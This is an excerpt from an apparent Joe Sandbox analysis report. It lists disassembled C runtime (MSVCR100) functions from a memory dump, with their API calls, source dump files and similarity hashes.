                                                                                                          • Instruction ID: 869ecfe5d05aea893ad2a0d0a360019c4dccfac878a9d12e9c9aebaec5f0e7ef
                                                                                                          • Opcode Fuzzy Hash: 387a33c679bef24cc6c659b1b9208225730ec43d42cb7bc1a6f4d523fa5bba77
                                                                                                          • Instruction Fuzzy Hash: F5117231542725FFDBA15F62C908E9E3B74EF427B4B478226E4248A1C0D730BA42CA61
                                                                                                          Function 6FDF6A27 Relevance: 12.1, APIs: 8, Instructions: 69COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,?,6FDF68DE,?,?), ref: 6FDF6A33
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,6FDF68DE,?,?), ref: 6FDF6A3E
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100(?,?,?,6FDF68DE,?,?), ref: 6FDF6A50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 4106058386-0
                                                                                                          • Opcode ID: 741c12903f02be10130847b1a7d444a73bd2747db00bfbce844fafae5b4108b6
                                                                                                          • Instruction ID: fbf9517b887b06ec8cd5b1be096f34a029338a5ae43dd52a9bc92f229a85967a
                                                                                                          • Opcode Fuzzy Hash: 741c12903f02be10130847b1a7d444a73bd2747db00bfbce844fafae5b4108b6
                                                                                                          • Instruction Fuzzy Hash: BA119D71502354EFEB505F64C808F4E3BA4EB433A4F168211E9219B1D0EB30B9519BA0
                                                                                                          Function 6FD826F7 Relevance: 12.1, APIs: 8, Instructions: 67COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6FD8270D
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6FD82778
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6FD82788
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6FD86922
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6FD886C9
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6FD886D1
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6FD886D9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DecrementInterlocked
                                                                                                          • String ID:
                                                                                                          • API String ID: 3448037634-0
                                                                                                          • Opcode ID: ef1679057d215a1fbce05958b3d8f56c1cc1f05aa1a71252c269b7971c26e9eb
                                                                                                          • Instruction ID: c7477ed1a2f689488cd7b60716e3b6f60892374724600e9f4a7401bdee787615
                                                                                                          • Opcode Fuzzy Hash: ef1679057d215a1fbce05958b3d8f56c1cc1f05aa1a71252c269b7971c26e9eb
                                                                                                          • Instruction Fuzzy Hash: 80114F74B44319EBDB409F7ACD84B4AF7ACBF4675AF044526E928DB100D774F4018BA0
                                                                                                          Function 6FD81F60 Relevance: 12.1, APIs: 8, Instructions: 64COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InterlockedIncrement.KERNEL32(00000001), ref: 6FD81F72
                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 6FD81FDD
                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 6FD81FEB
                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 6FD8252C
                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 6FD82535
                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 6FD8253D
                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 6FD82545
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IncrementInterlocked
                                                                                                          • String ID:
                                                                                                          • API String ID: 3508698243-0
                                                                                                          • Opcode ID: 7f2d96db30282962e9827627960beb581229818ef05f63f68c9d3f1f1131406e
                                                                                                          • Instruction ID: 00e51d7be46c631cbe124ed9878bb027801f6c383d6dec2a5165a2c1d4f50473
                                                                                                          • Opcode Fuzzy Hash: 7f2d96db30282962e9827627960beb581229818ef05f63f68c9d3f1f1131406e
                                                                                                          • Instruction Fuzzy Hash: 21114C76B88319EBDB819F79CD84B4AF7ACAF05354F044666A538CB100D774F4188BA0
                                                                                                          Function 6FDF8734 Relevance: 12.1, APIs: 8, Instructions: 59COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDF8810,00000010,6FDA8C0C,00000000,?,00000000,?,6FD8EF1C,?,6FD8EF38,0000000C), ref: 6FDF8748
                                                                                                          • _errno.MSVCR100(6FDF8810,00000010,6FDA8C0C,00000000,?,00000000,?,6FD8EF1C,?,6FD8EF38,0000000C), ref: 6FDF8767
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDF8810,00000010,6FDA8C0C,00000000,?,00000000,?,6FD8EF1C,?,6FD8EF38,0000000C), ref: 6FDF8772
                                                                                                          • _get_osfhandle.MSVCR100(?,6FDF8810,00000010,6FDA8C0C,00000000,?,00000000,?,6FD8EF1C,?,6FD8EF38,0000000C), ref: 6FDF87AE
                                                                                                          • FlushFileBuffers.KERNEL32(00000000,6FDF8810,00000010,6FDA8C0C,00000000,?,00000000,?,6FD8EF1C,?,6FD8EF38,0000000C), ref: 6FDF87B5
                                                                                                          • GetLastError.KERNEL32(?,6FD8EF1C,?,6FD8EF38,0000000C), ref: 6FDF87BF
                                                                                                          • __doserrno.MSVCR100(?,?,?,?,6FD8EF1C,?,6FD8EF38,0000000C), ref: 6FDF87D4
                                                                                                          • _errno.MSVCR100(6FDF8810,00000010,6FDA8C0C,00000000,?,00000000,?,6FD8EF1C,?,6FD8EF38,0000000C), ref: 6FDF87DE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$BuffersErrorFileFlushLast__doserrno_get_osfhandle_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 3018510309-0
                                                                                                          • Opcode ID: 2af0c80c5ca0622c9f9bdc0b3fb7356e32faf129d85e29e92758a313a8110d09
                                                                                                          • Instruction ID: 0b0c1593c682e31f2adc5506d390d9229d7961e80931823d5a648600ea600c5e
                                                                                                          • Opcode Fuzzy Hash: 2af0c80c5ca0622c9f9bdc0b3fb7356e32faf129d85e29e92758a313a8110d09
                                                                                                          • Instruction Fuzzy Hash: 9111E17184A705DFDB80AF76C988B5D3770AF02368F024645D4306F2D0CBB8B9028BA2
                                                                                                          Function 6FD806FC Relevance: 12.0, APIs: 8, Instructions: 46threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32(6FD731F8,?,6FD8081A,6FE18032), ref: 6FD80700
                                                                                                          • __set_flsgetvalue.MSVCR100 ref: 6FD8070E
                                                                                                            • Part of subcall function 6FD80341: TlsGetValue.KERNEL32(?,6FD80713), ref: 6FD8034A
                                                                                                          • SetLastError.KERNEL32(00000000), ref: 6FD80720
                                                                                                          • _calloc_crt.MSVCR100(00000001,00000214), ref: 6FDA75B7
                                                                                                          • DecodePointer.KERNEL32(00000000), ref: 6FDA75D5
                                                                                                          • _initptd.MSVCR100(00000000,00000000), ref: 6FDA75E4
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6FDA75EB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$CurrentDecodePointerThreadValue__set_flsgetvalue_calloc_crt_initptd
                                                                                                          • String ID:
                                                                                                          • API String ID: 242762301-0
                                                                                                          • Opcode ID: 0d8c1af519b5033f442e99f0ccbf15590634bfe2858f5433fd01175dd3a9dc5f
                                                                                                          • Instruction ID: 129b6c89198d2d311b3d84f84b72e91bcc555b2aabb4993e3f0e21ab4aff0c30
                                                                                                          • Opcode Fuzzy Hash: 0d8c1af519b5033f442e99f0ccbf15590634bfe2858f5433fd01175dd3a9dc5f
                                                                                                          • Instruction Fuzzy Hash: 25F02D33402F61ABE76227749C0DB5E3FD1AF43B717140216F535DA0C1DF21B4115AA4
                                                                                                          Function 6FDC6075 Relevance: 12.0, APIs: 8, Instructions: 43COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ?__ExceptionPtrCopy@@YAXPAXPBX@Z.MSVCR100(?,00000008,00000014,6FDC579F,?,?,?), ref: 6FDC6093
                                                                                                          • ?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(00000008,?,00000008,00000014,6FDC579F,?,?,?), ref: 6FDC609D
                                                                                                          • ??3@YAXPAX@Z.MSVCR100(00000008,00000008,?,00000008,00000014,6FDC579F,?,?,?), ref: 6FDC60A3
                                                                                                          • __uncaught_exception.MSVCR100 ref: 6FDC60AF
                                                                                                          • ?__ExceptionPtrCopy@@YAXPAXPBX@Z.MSVCR100(?,?), ref: 6FDC60C0
                                                                                                          • ?__ExceptionPtrRethrow@@YAXPBX@Z.MSVCR100(?,?,?), ref: 6FDC60CD
                                                                                                          • ?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(?,?,?,?), ref: 6FDC60DA
                                                                                                          • ?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(?), ref: 6FDC60EA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception$Destroy@@$Copy@@$??3@Rethrow@@__uncaught_exception
                                                                                                          • String ID:
                                                                                                          • API String ID: 2060748252-0
                                                                                                          • Opcode ID: 200972981e9ff94e12b66a2f94e1a3654d9be7ec0dfcf9e57fe17ba40959a197
                                                                                                          • Instruction ID: 4b6a36e53648036f5b42180c1c3895b5cdb7b2605d7e07ea4b3fbff70797e9f2
                                                                                                          • Opcode Fuzzy Hash: 200972981e9ff94e12b66a2f94e1a3654d9be7ec0dfcf9e57fe17ba40959a197
                                                                                                          • Instruction Fuzzy Hash: 7A017CB2C01318AADF80D7F48845BEDB77CAF05218F910656D5A4B30C0D778F60596B3
                                                                                                          Function 6FDCC41C Relevance: 12.0, APIs: 8, Instructions: 29threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __set_flsgetvalue.MSVCR100 ref: 6FDCC421
                                                                                                            • Part of subcall function 6FD80341: TlsGetValue.KERNEL32(?,6FD80713), ref: 6FD8034A
                                                                                                          • __get_tlsindex.MSVCR100 ref: 6FDCC426
                                                                                                          • ___fls_getvalue@4.MSVCR100(00000000), ref: 6FDCC42C
                                                                                                            • Part of subcall function 6FDCC6AA: TlsGetValue.KERNEL32(?), ref: 6FDCC6B8
                                                                                                          • __get_tlsindex.MSVCR100(?), ref: 6FDCC438
                                                                                                          • ___fls_setvalue@8.MSVCR100(00000000,?), ref: 6FDCC43E
                                                                                                            • Part of subcall function 6FDCC6CA: DecodePointer.KERNEL32(?,?), ref: 6FDCC6DB
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCC447
                                                                                                          • ExitThread.KERNEL32 ref: 6FDCC44E
                                                                                                          • _freefls.MSVCR100(?), ref: 6FDCC46A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value__get_tlsindex$DecodeErrorExitLastPointerThread___fls_getvalue@4___fls_setvalue@8__set_flsgetvalue_freefls
                                                                                                          • String ID:
                                                                                                          • API String ID: 392714122-0
                                                                                                          • Opcode ID: 91eb3f959b4c77bbeba206682e0d86c73b775b95e65c48e80fd5e28a1a3ebf23
                                                                                                          • Instruction ID: 0b944d5ebe2ef9354cfb2bbdbd4e750836304e81a72295bf9b2043bda28d74a8
                                                                                                          • Opcode Fuzzy Hash: 91eb3f959b4c77bbeba206682e0d86c73b775b95e65c48e80fd5e28a1a3ebf23
                                                                                                          • Instruction Fuzzy Hash: 3AF082744007C0AFDB84ABB1C948C1E3BADAF4535C310D014EA088B266DB34F4429AB2
                                                                                                          Function 6FE00249 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 327stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(000000FF,?,?,?,?,000000FF,?), ref: 6FE0027D
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(000000FF,?,?,?,?,000000FF,?), ref: 6FE00287
                                                                                                          • _errno.MSVCR100(000000FF,?,?,?,?,000000FF,?), ref: 6FE002B3
                                                                                                          • strrchr.MSVCR100(?,00000065,?,000000A3,000000FF,?,?,?,?,000000FF), ref: 6FE00347
                                                                                                          • memset.MSVCR100(?,00000030,00000000,000000A3,000000FF,?,?,?,?,000000FF,?), ref: 6FE004CF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfomemsetstrrchr
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 716319809-4108050209
                                                                                                          • Opcode ID: 6123f78e429a424b9027d14163421e0b8db07205c18fe15d44cbe51702e0ca1e
                                                                                                          • Instruction ID: f49a64e9c771246d58008e9f4c6626c8e7fbe87e7e20fb0a8b525a8c97d36ade
                                                                                                          • Opcode Fuzzy Hash: 6123f78e429a424b9027d14163421e0b8db07205c18fe15d44cbe51702e0ca1e
                                                                                                          • Instruction Fuzzy Hash: 89C146719043868FEB11DF68C88179E7FA1EF52308F34916ED6949B381D374AA61C7A1
                                                                                                          Function 6FDF2B5C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 317COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • malloc.MSVCR100(?), ref: 6FDF2C41
                                                                                                          • _freea_s.MSVCR100(?), ref: 6FDF2C9D
                                                                                                          • _wcsicmp.MSVCR100(?,am/pm,?,?,?,?,?,?,00000000,?,6FDF34C9,?,?), ref: 6FDF2D58
                                                                                                          • _wcsicmp.MSVCR100(?,a/p,?,?,?,?,?,?,00000000,?,6FDF34C9,?,?), ref: 6FDF2D6E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmp$_freea_smalloc
                                                                                                          • String ID: a/p$am/pm
                                                                                                          • API String ID: 4283237980-3206640213
                                                                                                          • Opcode ID: bb166d0a13e14e204959b91b685990c70ef59638ce91aa96441dc8c635fea6fd
                                                                                                          • Instruction ID: 976b3fc4a18c583d72e30671b3d5b5a7a82783f9f7d14afe201117fac633a178
                                                                                                          • Opcode Fuzzy Hash: bb166d0a13e14e204959b91b685990c70ef59638ce91aa96441dc8c635fea6fd
                                                                                                          • Instruction Fuzzy Hash: 58B1E231942786CADB808F58C980FEA77B1FF5530EF62441AD551AF290E336B943CBA1
                                                                                                          Function 6FD8FDBF Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 287COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: '$@$g
                                                                                                          • API String ID: 0-3359089917
                                                                                                          • Opcode ID: fc322fa42c010efd94762e07ae6f31fa273a9a63b044b28d234036991f9f716e
                                                                                                          • Instruction ID: ac9c3df69480a903e1c66da76cb2e2f4b62b4751f66d355685eca215bc445b24
                                                                                                          • Opcode Fuzzy Hash: fc322fa42c010efd94762e07ae6f31fa273a9a63b044b28d234036991f9f716e
                                                                                                          • Instruction Fuzzy Hash: DAC16876C4432DCADBA09B64CC887D9B7B4AF55324F2002DAD468AB191D774BBC5CF90
                                                                                                          Function 6FD82DE8 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 242stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • strlen.MSVCR100(6FDB3088), ref: 6FD82DDB
                                                                                                          • _get_printf_count_output.MSVCR100 ref: 6FD82E42
                                                                                                          • _errno.MSVCR100(?), ref: 6FD83D3A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_get_printf_count_outputstrlen
                                                                                                          • String ID: @$@$g
                                                                                                          • API String ID: 3252504771-3810856864
                                                                                                          • Opcode ID: bddc5b890515b342bdd55bf8670d85a22b32fc59fe6ea6c27636dd2a8ae975de
                                                                                                          • Instruction ID: 361ef81525e4bbeb4e005f419b784dd204afeecbe03ab40bbc3181996c2542b8
                                                                                                          • Opcode Fuzzy Hash: bddc5b890515b342bdd55bf8670d85a22b32fc59fe6ea6c27636dd2a8ae975de
                                                                                                          • Instruction Fuzzy Hash: 17A13BF1904368CEDBA18B24CD817D9B7B4AF45319F1041EAD66CA7281E734BAC5CF68
                                                                                                          Function 6FDDC9A6 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 242COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?), ref: 6FDDC9CC
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDDC9D7
                                                                                                          • _isctype_l.MSVCR100(?,00000008,?), ref: 6FDDCA29
                                                                                                          • _errno.MSVCR100(000000FF,000000FF,?), ref: 6FDDCBD5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo_isctype_l
                                                                                                          • String ID: $$0
                                                                                                          • API String ID: 2492265471-389342756
                                                                                                          • Opcode ID: 3bcb1ac8a438c7cd59a15707ee7fb08715421f703e51acc5e3730df0ecbde461
                                                                                                          • Instruction ID: ca7cda58ba809a3a2a00b964766d47fc195ec407e60b3d5cb06c72668333bd0d
                                                                                                          • Opcode Fuzzy Hash: 3bcb1ac8a438c7cd59a15707ee7fb08715421f703e51acc5e3730df0ecbde461
                                                                                                          • Instruction Fuzzy Hash: C4A19B70C0935ADBDF55CFA8D9817EEBBB1AF05354F10025AF8A0A7290C370BA45CBA1
                                                                                                          Function 6FD8EAAD Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 233COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • atol.MSVCR100(6FD8EAA8,6FD8EAA8,00000010,FFFF0000,00000000,00000000), ref: 6FDAD469
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: atol
                                                                                                          • String ID: .$.$NULL$`non-type-template-parameter$`template-parameter
                                                                                                          • API String ID: 1464325613-3945972591
                                                                                                          • Opcode ID: 51dbd8fcd04a5a810b26fb130c161da7a2e2a5206b58c0e0ba427f3e08a08d80
                                                                                                          • Instruction ID: c7b5646f128faebae17dc20a015a48c4520f8c017a6b56878db7da2a8cd83d1c
                                                                                                          • Opcode Fuzzy Hash: 51dbd8fcd04a5a810b26fb130c161da7a2e2a5206b58c0e0ba427f3e08a08d80
                                                                                                          • Instruction Fuzzy Hash: 2071D271904708AADB90DBB8CC84BEEB77EBF02308F50485AE556A70C0DF75B944CB69
                                                                                                          Function 6FDFE38C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FD806FC: GetLastError.KERNEL32(6FD731F8,?,6FD8081A,6FE18032), ref: 6FD80700
                                                                                                            • Part of subcall function 6FD806FC: __set_flsgetvalue.MSVCR100 ref: 6FD8070E
                                                                                                            • Part of subcall function 6FD806FC: SetLastError.KERNEL32(00000000), ref: 6FD80720
                                                                                                          • _calloc_crt.MSVCR100(00000086,00000002), ref: 6FDFE3B5
                                                                                                            • Part of subcall function 6FDFC284: __sys_nerr.MSVCR100(?,?,6FDFC33C,00000000), ref: 6FDFC291
                                                                                                            • Part of subcall function 6FDFC284: __sys_nerr.MSVCR100(?,?,6FDFC33C,00000000), ref: 6FDFC29A
                                                                                                            • Part of subcall function 6FDFC284: __sys_errlist.MSVCR100(?,?,6FDFC33C,00000000), ref: 6FDFC2A1
